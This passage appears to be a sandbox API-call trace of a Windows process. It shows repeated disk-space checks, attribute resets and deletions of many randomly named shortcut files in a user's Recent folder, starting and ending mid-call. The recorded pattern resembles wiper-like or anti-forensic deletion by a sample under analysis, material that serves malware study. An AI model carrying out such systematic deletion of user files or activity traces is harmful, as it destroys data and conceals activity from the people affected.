GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.840] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t0NLJQD3LDlv.mkv.lnk", dwFileAttributes=0x80) returned 1 [0150.840] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t0NLJQD3LDlv.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t0nljqd3ldlv.mkv.lnk")) returned 1 [0150.843] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.848] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t3yDnCX0.lnk", dwFileAttributes=0x80) returned 1 [0150.849] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t3yDnCX0.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t3ydncx0.lnk")) returned 1 [0150.851] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.857] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TKHuy.lnk", dwFileAttributes=0x80) returned 1 [0150.857] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TKHuy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tkhuy.lnk")) returned 1 [0150.860] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.865] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tMUX0jclAJskpK0LQa.lnk", dwFileAttributes=0x80) returned 1 [0150.865] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tMUX0jclAJskpK0LQa.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tmux0jclajskpk0lqa.lnk")) returned 1 [0150.868] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.873] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ToZUo4ySLw8I_WrMcgXS.lnk", dwFileAttributes=0x80) returned 1 [0150.873] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ToZUo4ySLw8I_WrMcgXS.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tozuo4yslw8i_wrmcgxs.lnk")) returned 1 [0150.876] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.882] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TXBg7dagYX16D.lnk", dwFileAttributes=0x80) returned 1 [0150.883] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TXBg7dagYX16D.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\txbg7dagyx16d.lnk")) returned 1 [0150.885] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.891] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u0n7Fy.lnk", dwFileAttributes=0x80) returned 1 [0150.891] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u0n7Fy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u0n7fy.lnk")) returned 1 [0150.894] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.899] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ULwhC0QfEu.lnk", dwFileAttributes=0x80) returned 1 [0150.899] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ULwhC0QfEu.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ulwhc0qfeu.lnk")) returned 1 [0150.902] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.907] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uNe5.lnk", dwFileAttributes=0x80) returned 1 [0150.908] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uNe5.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\une5.lnk")) returned 1 [0150.910] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.915] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uoZBII7UTAi0gwP.lnk", dwFileAttributes=0x80) returned 1 [0150.916] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uoZBII7UTAi0gwP.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uozbii7utai0gwp.lnk")) returned 1 [0150.919] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.925] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uz5nIkQ51Vwurs3d7Y.lnk", dwFileAttributes=0x80) returned 1 [0150.925] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uz5nIkQ51Vwurs3d7Y.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uz5nikq51vwurs3d7y.lnk")) returned 1 [0150.928] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.933] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\v-QJjzr3o60.lnk", dwFileAttributes=0x80) returned 1 [0150.934] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\v-QJjzr3o60.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\v-qjjzr3o60.lnk")) returned 1 [0150.936] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.942] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VRc0vG4L.lnk", dwFileAttributes=0x80) returned 1 [0150.942] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VRc0vG4L.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vrc0vg4l.lnk")) returned 1 [0150.945] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.950] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VrCt5.flv.lnk", dwFileAttributes=0x80) returned 1 [0150.950] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VrCt5.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vrct5.flv.lnk")) returned 1 [0150.953] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.958] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w3yb2C.lnk", dwFileAttributes=0x80) returned 1 [0150.958] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w3yb2C.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\w3yb2c.lnk")) returned 1 [0150.961] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.966] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WaKiw0j9.lnk", dwFileAttributes=0x80) returned 1 [0150.967] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WaKiw0j9.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wakiw0j9.lnk")) returned 1 [0150.969] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.975] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WEUqdFSX9FloRgX.lnk", dwFileAttributes=0x80) returned 1 [0150.975] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WEUqdFSX9FloRgX.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\weuqdfsx9florgx.lnk")) returned 1 [0150.978] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.983] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Wg15I33qxUYLCCh4yYuA.mkv.lnk", dwFileAttributes=0x80) returned 1 [0150.984] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Wg15I33qxUYLCCh4yYuA.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wg15i33qxuylcch4yyua.mkv.lnk")) returned 1 [0150.987] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.992] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WjffJkV7RZf9-Y.lnk", dwFileAttributes=0x80) returned 1 [0150.992] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WjffJkV7RZf9-Y.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wjffjkv7rzf9-y.lnk")) returned 1 [0150.995] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.000] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wJFWMC2Th.lnk", dwFileAttributes=0x80) returned 1 [0151.001] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wJFWMC2Th.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wjfwmc2th.lnk")) returned 1 [0151.003] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.008] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wJSrkvxMGpGhoHTZXy1b.lnk", dwFileAttributes=0x80) returned 1 [0151.009] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wJSrkvxMGpGhoHTZXy1b.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wjsrkvxmgpghohtzxy1b.lnk")) returned 1 [0151.012] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.018] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WpjjdiycYBXa2Lnq5XG7.lnk", dwFileAttributes=0x80) returned 1 [0151.018] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WpjjdiycYBXa2Lnq5XG7.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wpjjdiycybxa2lnq5xg7.lnk")) returned 1 [0151.021] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.026] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wROOf2dw16y.lnk", dwFileAttributes=0x80) returned 1 [0151.026] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wROOf2dw16y.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wroof2dw16y.lnk")) returned 1 [0151.029] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.035] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WXzNkB_RCNQY.lnk", dwFileAttributes=0x80) returned 1 [0151.035] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WXzNkB_RCNQY.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wxznkb_rcnqy.lnk")) returned 1 [0151.038] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.043] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xA37wZPor7yjciF8Nu.lnk", dwFileAttributes=0x80) returned 1 [0151.044] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xA37wZPor7yjciF8Nu.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xa37wzpor7yjcif8nu.lnk")) returned 1 [0151.046] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.052] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XAh43x.lnk", dwFileAttributes=0x80) returned 1 [0151.052] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XAh43x.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xah43x.lnk")) returned 1 [0151.055] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.060] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xHSne.lnk", dwFileAttributes=0x80) returned 1 [0151.060] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xHSne.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xhsne.lnk")) returned 1 [0151.063] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.068] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XWhiMKTJhTgWC fxuM.lnk", dwFileAttributes=0x80) returned 1 [0151.069] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XWhiMKTJhTgWC fxuM.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xwhimktjhtgwc fxum.lnk")) returned 1 [0151.072] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.077] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XWLaiCU3qY83M.mkv.lnk", dwFileAttributes=0x80) returned 1 [0151.078] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XWLaiCU3qY83M.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xwlaicu3qy83m.mkv.lnk")) returned 1 [0151.080] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.085] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XwNDV3C-J2ZAx.lnk", dwFileAttributes=0x80) returned 1 [0151.086] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XwNDV3C-J2ZAx.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\xwndv3c-j2zax.lnk")) returned 1 [0151.089] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.094] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\y-3PV.lnk", dwFileAttributes=0x80) returned 1 [0151.094] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\y-3PV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\y-3pv.lnk")) returned 1 [0151.097] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.102] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\y49x.mkv.lnk", dwFileAttributes=0x80) returned 1 [0151.102] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\y49x.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\y49x.mkv.lnk")) returned 1 [0151.105] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, 